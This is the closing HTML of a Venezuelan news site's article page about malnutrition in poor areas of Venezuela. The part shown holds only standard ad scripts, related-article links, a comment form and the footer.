								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}</script></div></div>					</div>
							<div class="post-share single-post-share bottom-share">

			<span class="share-handler"></span>

			<ul class="social-list clearfix">
				<li class="social-item facebook"><a href="javascript: window.open('http://www.facebook.com/sharer.php?u=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=900, height=450');" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i><span class="item-title">Facebook</span></a></li><li class="social-item twitter"><a href="javascript: window.open('http://twitter.com/share?text=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela&url=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=900, height=450');" target="_blank" rel="nofollow"><i class="fa fa-twitter"></i><span class="item-title">Twitter</span></a></li><li class="social-item google_plus"><a href="javascript: window.open('http://plus.google.com/share?url=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=500, height=450');" target="_blank" rel="nofollow"><i class="fa fa-google-plus"></i><span class="item-title">Google+</span></a></li><li class="social-item email"><a href="mailto:?subject=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela&body=http://elperiodicovenezolano.com/?p=382254" target="_blank" rel="nofollow"><i class="fa fa-envelope"></i><span class="item-title">Email</span></a></li><li class="social-item whatsapp"><a href="whatsapp://send?text=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela  

http://elperiodicovenezolano.com/?p=382254" target="_blank" rel="nofollow"><i class="fa fa-whatsapp"></i><span class="item-title">WhatsApp</span></a></li>			</ul>

		</div>
		<meta itemprop="headline" content="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela" /><meta itemprop="url" content="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/" /><meta itemprop="datePublished" content="2018-02-05T07:00:58+00:00" /><meta itemprop="image" content="http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion.jpg" /><meta itemprop="author" content="j.gil" /><meta itemprop="interactionCount" content="0" /><div itemprop='publisher' itemscope='' itemtype='https://schema.org/Organization' style='display:none;'>
	<div itemprop='logo' itemscope='' itemtype='https://schema.org/ImageObject'>
		<img src='http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv.png'/>
		<meta content='http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv.png' itemprop='url'/>
	</div>
	<meta content='El Periódico Venezolano' itemprop='name'/>
</div>
				</article>
							</div>
			<div class="post-related">

	<h4 class="section-heading multi-tab">
		<a href="#relatedposts_200763293_1" class="main-link active" data-toggle="tab">
				<span
					class="h-text related-posts-heading">También podría gustarte</span>
		</a>
		<a href="#relatedposts_200763293_2" class="other-link" data-toggle="tab"
		   data-deferred-event="shown.bs.tab"
		   data-deferred-init="relatedposts_200763293_2">
				<span
					class="h-text related-posts-heading">Más del autor</span>
		</a>
	</h4>

	<div class="tab-content">
		<div class="tab-pane bs-tab-anim bs-tab-animated active"
		     id="relatedposts_200763293_1">
					<div class="bs-pagination-wrapper main-term-none next_prev ">
			<div class="listing listing-grid listing-grid-1 clearfix columns-3">
		<article class="post-382261 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/cabello-asegura-que-la-oposicion-tiene-un-problema-interno/" title="Cabello asegura que la oposición tiene un problema interno"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2017/10/diosdado-cabello-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/cabello-asegura-que-la-oposicion-tiene-un-problema-interno/" class="post-title post-url">
				Cabello asegura que la oposición tiene un problema interno			</a>
		</h2>
			</article>
	<article class="post-382258 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/rodriguez-torres-invita-a-dicotomia-de-chavistas-opositores/" title="Rodríguez Torres invita a dicotomía de chavistas/opositores"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/Miguel-Rodríguez-Torres-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/rodriguez-torres-invita-a-dicotomia-de-chavistas-opositores/" class="post-title post-url">
				Rodríguez Torres invita a dicotomía de chavistas/opositores			</a>
		</h2>
			</article>
	<article class="post-381781 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/delsa-solorzano-rechazo-injerencias-de-la-anc-en-materia-penal/" title="Delsa Solórzano rechazó injerencias de la ANC en materia penal"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/01/Delsa-Solórzano-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/delsa-solorzano-rechazo-injerencias-de-la-anc-en-materia-penal/" class="post-title post-url">
				Delsa Solórzano rechazó injerencias de la ANC en materia penal			</a>
		</h2>
			</article>
	<article class="post-381773 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/miguel-rodriguez-torres-es-inhabilitado/" title="Miguel Rodríguez Torres es inhabilitado"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/Miguel-Rodríguez-Torres-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/miguel-rodriguez-torres-es-inhabilitado/" class="post-title post-url">
				Miguel Rodríguez Torres es inhabilitado			</a>
		</h2>
			</article>
	<article class="post-381769 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/vicente-leon-la-mayoria-de-los-venezolanos-no-sabe-por-quien-votar/" title="Vicente León: la mayoría de los venezolanos no sabe por quién votar"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/01/Luis-Vicente-León-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/vicente-leon-la-mayoria-de-los-venezolanos-no-sabe-por-quien-votar/" class="post-title post-url">
				Vicente León: la mayoría de los venezolanos no sabe por quién votar			</a>
		</h2>
			</article>
	<article class="post-381597 type-post format-standard has-post-thumbnail simple-grid  listing-item listing-item-grid listing-item-grid-1 main-term-2">

					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/los-contradictorios-comentarios-de-la-mud-y-el-gobierno-sobre-preacuerdo/" title="Los contradictorios comentarios de la MUD y el Gobierno sobre preacuerdo"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/01/dialogo-venezuela-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a href="http://elperiodicovenezolano.com/los-contradictorios-comentarios-de-la-mud-y-el-gobierno-sobre-preacuerdo/" class="post-title post-url">
				Los contradictorios comentarios de la MUD y el Gobierno sobre preacuerdo			</a>
		</h2>
			</article>
	</div>
			</div>
		<div class="bs-pagination bs-ajax-pagination next_prev main-term-none clearfix">
			<script>var bs_ajax_paginate_659002406 = '{"query":{"paginate":"next_prev","count":6,"posts_per_page":"6","post__not_in":[382254],"category__in":[2]},"type":"wp_query","view":"Publisher::fetch_related_posts","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","paginate":"next_prev","_bs_pagin_token":"92eaa58"}';</script>				<a class="btn-bs-pagination prev disabled" rel="prev" data-id="659002406"
				   title="Anterior">
					<i class="fa fa-caret-left"
					   aria-hidden="true"></i> Prev				</a>
				<a  rel="next" class="btn-bs-pagination next"
				   data-id="659002406" title="Siguiente">
					Next <i
						class="fa fa-caret-right" aria-hidden="true"></i>
				</a>
				</div>		</div>

		<div class="tab-pane bs-tab-anim bs-tab-animated bs-deferred-container"
		     id="relatedposts_200763293_2">
					<div class="bs-pagination-wrapper main-term-none next_prev ">
				<div class="bs-deferred-load-wrapper" id="bsd_relatedposts_200763293_2">
			<script>var bs_deferred_loading_bsd_relatedposts_200763293_2 = '{"query":{"paginate":"next_prev","count":3,"author":4,"post_type":"post"},"type":"wp_query","view":"Publisher::fetch_other_related_posts","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","paginate":"next_prev","_bs_pagin_token":"e70dace"}';</script>
		</div>
				</div>
				</div>
	</div>
</div>
<section id="comments-template-382254" class="comments-template">
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><h4 class="section-heading" ><span class="h-text">Deja una respuesta</span></h4> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/#respond" style="display:none;">Cancelar respuesta</a></small></h3>			<form action="http://elperiodicovenezolano.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<div class="note-before"><p>Su dirección de correo electrónico no será publicada.</p>
</div><p class="comment-wrap"><textarea name="comment" class="comment" id="comment" cols="45" rows="10" aria-required="true" placeholder="Tu comentario"></textarea></p><p class="author-wrap"><input name="author" class="author" id="author" type="text" value="" size="45" aria-required="true" placeholder="Tu nombre" /></p>
<p class="email-wrap"><input name="email" class="email" id="email" type="text" value="" size="45" aria-required="true" placeholder="Tu correo electrónico" /></p>
<p class="url-wrap"><input name="url" class="url" id="url" type="text" value="" size="45" placeholder="Su página web" /></p>
<p class="cptch_block"><span class="cptch_wrap cptch_math_actions">
				<label class="cptch_label" for="cptch_input_6"><span class="cptch_span"><input id="cptch_input_6" class="cptch_input cptch_wp_comments" type="text" autocomplete="off" name="cptch_number" value="" maxlength="2" size="2" aria-required="true" required="required" style="margin-bottom:0;display:inline;font-size: 12px;width: 40px;" /></span>
					<span class="cptch_span">&nbsp;&minus;&nbsp;</span>
					<span class="cptch_span">3</span>
					<span class="cptch_span">&nbsp;=&nbsp;</span>
					<span class="cptch_span">uno</span>
					<input type="hidden" name="cptch_result" value="yqE=" /><input type="hidden" name="cptch_time" value="1517843624" />
					<input type="hidden" name="cptch_form" value="wp_comments" />
				</label><span class="cptch_reload_button_wrap hide-if-no-js">
					<noscript>
						<style type="text/css">
							.hide-if-no-js {
								display: none !important;
							}
						</style>
					</noscript>
					<span class="cptch_reload_button dashicons dashicons-update"></span>
				</span></span></p><p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="comment-submit" value="publicar comentario" /> <input type='hidden' name='comment_post_ID' value='382254' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	</section>
		</div><!-- .content-column -->

					<div class=" col-sm-4 sidebar-column">
				<aside id="sidebar-primary-sidebar" class="sidebar" role="complementary" aria-label="Publisher Primary Sidebar" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
	<div id="better-ads-2" class=" widget-havent-icon widget-havent-title primary-sidebar-widget widget widget_better-ads"><div class="betteradscontainer betterads-clearfix  betterads-align-center betterad-column-1"><div id="betterad-29-18237509245a7874a81ce9b" class="betterad-container betterad-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="29" data-type="code"><span id="betterad-29-18237509245a7874a81ce9b-place"></span><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">function betteradsmanager_get_size_from_width( width ) { 											var size = ["125", "125"]; 											if ( width >= 728 )  												size = ["728", "90"]; 											else if ( width >= 468 ) 												size = ["468", "60"]; 											else if ( width >= 336 ) 												size = ["336", "280"]; 											else if ( width >= 300 ) 												size = ["300", "250"]; 											else if ( width >= 250 ) 												size = ["250", "250"]; 											else if ( width >= 200 ) 												size = ["200", "200"]; 											else if ( width >= 180 ) 												size = ["180", "150"]; 											return size; 										}function betteradsmanager_html_to_element(html) { 										    var template = document.createElement('template'); 										    template.innerHTML = html; 										    return template.content.firstChild; 										}</script><script type="text/javascript">betterads_screen_width = document.body.clientWidth;betterads_screen_width = document.body.clientWidth;betterads_el_place = document.getElementById('betterad-29-18237509245a7874a81ce9b-place');betterads_el = document.getElementById('betterad-29-18237509245a7874a81ce9b'); 								 								if (betterads_el.getBoundingClientRect().width) { 									betterads_el_width = betterads_el.getBoundingClientRect().width; 								} else { 									betterads_el_width = betterads_el.offsetWidth; 								} 								 								betterads_el_width = betteradsmanager_get_size_from_width( betterads_el_width );if ( betterads_screen_width >= 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="4586673633"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="4586673633"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="4586673633"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width < 768 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="4586673633"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}</script></div></div></div><div id="bs-recent-posts-2" class=" widget-havent-icon widget-have-title primary-sidebar-widget widget widget_bs-recent-posts"><h4 class="widget-heading"><span class="h-text">Últimas Noticias</span></h4>	<div class="bs-theme-shortcode bs-recent-posts">
			<div class="listing listing-thumbnail listing-tb-2 clearfix columns-2">
	<article class="post-382268 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-1">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-1"><a href="http://elperiodicovenezolano.com/salud/">Salud</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/conoce-los-beneficios-de-la-semilla-del-aguacate/" title="Conoce los beneficios de la semilla del aguacate"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/aguacate-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" href="http://elperiodicovenezolano.com/conoce-los-beneficios-de-la-semilla-del-aguacate/" title="Conoce los beneficios de la semilla del aguacate">
				<span class="post-title">
					Conoce los beneficios de la semilla del aguacate				</span>
			</a>
		</h2>
	</div>
</article>
<article class="post-382264 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-6">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-6"><a href="http://elperiodicovenezolano.com/noticias-internacionales/">Noticias Internacionales</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/israel-asegura-que-hara-todo-lo-posible-para-defendese/" title="Israel asegura que hará todo lo posible para defendese"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/Netanyahu-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" href="http://elperiodicovenezolano.com/israel-asegura-que-hara-todo-lo-posible-para-defendese/" title="Israel asegura que hará todo lo posible para defendese">
				<span class="post-title">
					Israel asegura que hará todo lo posible para defendese				</span>
			</a>
		</h2>
	</div>
</article>
<article class="post-382261 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-2">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/cabello-asegura-que-la-oposicion-tiene-un-problema-interno/" title="Cabello asegura que la oposición tiene un problema interno"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2017/10/diosdado-cabello-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" href="http://elperiodicovenezolano.com/cabello-asegura-que-la-oposicion-tiene-un-problema-interno/" title="Cabello asegura que la oposición tiene un problema interno">
				<span class="post-title">
					Cabello asegura que la oposición tiene un problema interno				</span>
			</a>
		</h2>
	</div>
</article>
<article class="post-382258 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-2">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/rodriguez-torres-invita-a-dicotomia-de-chavistas-opositores/" title="Rodríguez Torres invita a dicotomía de chavistas/opositores"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/Miguel-Rodríguez-Torres-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" href="http://elperiodicovenezolano.com/rodriguez-torres-invita-a-dicotomia-de-chavistas-opositores/" title="Rodríguez Torres invita a dicotomía de chavistas/opositores">
				<span class="post-title">
					Rodríguez Torres invita a dicotomía de chavistas/opositores				</span>
			</a>
		</h2>
	</div>
</article>
<article class="post-382254 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-2">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/" title="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" itemprop="url" rel="bookmark" href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/" title="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela">
				<span class="post-title" itemprop="headline">
					¡Alarmante! Los niveles de desnutrición en las zonas pobres&hellip;				</span>
			</a>
		</h2>
	</div>
</article>
<article class="post-382245 type-post format-standard has-post-thumbnail  clearfix listing-item listing-item-thumbnail listing-item-tb-2 main-term-10">
	<div class="item-inner">
					<div class="featured">
				<div class="term-badges floated"><span class="term-badge term-10"><a href="http://elperiodicovenezolano.com/ocio/">Ocio</a></span></div>				<a class="img-holder" href="http://elperiodicovenezolano.com/colonias-de-playa-del-carmen-lugar-ideal-para-rentar-casas-vacacionales/" title="Colonias de Playa del Carmen, lugar ideal para rentar casas vacacionales"
				   style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/playa-el-carmen-357x210.jpg);"></a>
							</div>
		
		<h2 class="title">
			<a class="post-url" href="http://elperiodicovenezolano.com/colonias-de-playa-del-carmen-lugar-ideal-para-rentar-casas-vacacionales/" title="Colonias de Playa del Carmen, lugar ideal para rentar casas vacacionales">
				<span class="post-title">
					Colonias de Playa del Carmen, lugar ideal para rentar casas&hellip;				</span>
			</a>
		</h2>
	</div>
</article>
	</div>
		</div>
</div><div id="better-ads-3" class=" widget-havent-icon widget-havent-title primary-sidebar-widget widget widget_better-ads"><div class="betteradscontainer betterads-clearfix  betterads-align-center betterad-column-1"><div id="betterad-30-7679129385a7874a82c07f" class="betterad-container betterad-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="30" data-type="code"><span id="betterad-30-7679129385a7874a82c07f-place"></span><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">function betteradsmanager_get_size_from_width( width ) { 											var size = ["125", "125"]; 											if ( width >= 728 )  												size = ["728", "90"]; 											else if ( width >= 468 ) 												size = ["468", "60"]; 											else if ( width >= 336 ) 												size = ["336", "280"]; 											else if ( width >= 300 ) 												size = ["300", "250"]; 											else if ( width >= 250 ) 												size = ["250", "250"]; 											else if ( width >= 200 ) 												size = ["200", "200"]; 											else if ( width >= 180 ) 												size = ["180", "150"]; 											return size; 										}function betteradsmanager_html_to_element(html) { 										    var template = document.createElement('template'); 										    template.innerHTML = html; 										    return template.content.firstChild; 										}</script><script type="text/javascript">betterads_screen_width = document.body.clientWidth;betterads_screen_width = document.body.clientWidth;betterads_el_place = document.getElementById('betterad-30-7679129385a7874a82c07f-place');betterads_el = document.getElementById('betterad-30-7679129385a7874a82c07f'); 								 								if (betterads_el.getBoundingClientRect().width) { 									betterads_el_width = betterads_el.getBoundingClientRect().width; 								} else { 									betterads_el_width = betterads_el.offsetWidth; 								} 								 								betterads_el_width = betteradsmanager_get_size_from_width( betterads_el_width );if ( betterads_screen_width >= 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="2680046434"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="2680046434"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="2680046434"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width < 768 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="2680046434"></ins>'), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}</script></div></div></div></aside>
			</div><!-- .sidebar-column -->
		
	</div><!-- .main-section -->
</div><!-- .layout-2-col -->
</main><!-- main -->
</div><!-- .content-wrap -->
<footer id="site-footer" class="site-footer">
	<div class="footer-social-icons">
	<div class="content-wrap">
		<div class="container">
					<div
			class="better-studio-shortcode bsc-clearfix better-social-counter style-big-button colored in-5-col ">
						<ul class="social-list bsc-clearfix">			</ul>
		</div>
				</div>
	</div>
</div>
	<div class="copy-footer">
		<div class="content-wrap">
			<div class="container">
					<div class="row">
		<div class="col-lg-12">
			<div id="menu-footer" class="menu footer-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
				<nav class="footer-menu-container">
					<ul id="footer-navigation" class="footer-menu menu clearfix">
						<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-2 better-anim-fade menu-item-156"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-157"><a href="http://elperiodicovenezolano.com/noticias-internacionales/">Noticias Internacionales</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-10 better-anim-fade menu-item-158"><a href="http://elperiodicovenezolano.com/ocio/">Ocio</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1 better-anim-fade menu-item-159"><a href="http://elperiodicovenezolano.com/salud/">Salud</a></li>
					</ul>
				</nav>
			</div>
		</div>
	</div>
				<div class="row">
					<div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12">
						EPV - El Periódico Venezolano © 2016 - Derechos Reservados					</div>
					<div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12">
											</div>
				</div>
			</div>
		</div>
	</div>
</footer><!-- .footer -->

</div><!-- .main-wrap -->

	<span class="back-top"><i class="fa fa-arrow-up"></i></span>

<link rel='stylesheet' id='bs-slick-style-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/bs-theme-core/listing-pagin/assets/css/slick.min.css?ver=1.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/js/element-query.min.js?ver=2.7.11'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var better_post_views_vars = {"admin_ajax_url":"http:\/\/elperiodicovenezolano.com\/wp-admin\/admin-ajax.php","post_id":"382254"};
/* ]]> */
</script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-post-views/js/better-post-views.js?ver=1.3.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-social-counter/js/script.js?ver=1.6.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-adsmanager/js/advertising.js?ver=1.6.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var better_bam_loc = {"ajax_url":"http:\/\/elperiodicovenezolano.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-adsmanager/js/bam.js?ver=1.6.2'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/js/theme-libs.min.js?ver=1.6.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/js/pretty-photo.js?ver=2.7.11'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var publisher_theme_global_loc = {"ajax_url":"http:\/\/elperiodicovenezolano.com\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"Todas","tabs_more":"M\u00e1s"}};
var publisher_theme_ajax_search_loc = {"ajax_url":"http:\/\/elperiodicovenezolano.com\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>Mensajes<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Categor\u00edas<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Etiquetas<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/js/theme.js?ver=1.6.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-includes/js/comment-reply.min.js?ver=4.9.2'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-weather/js/skycons.js?ver=3.2.0'></script>
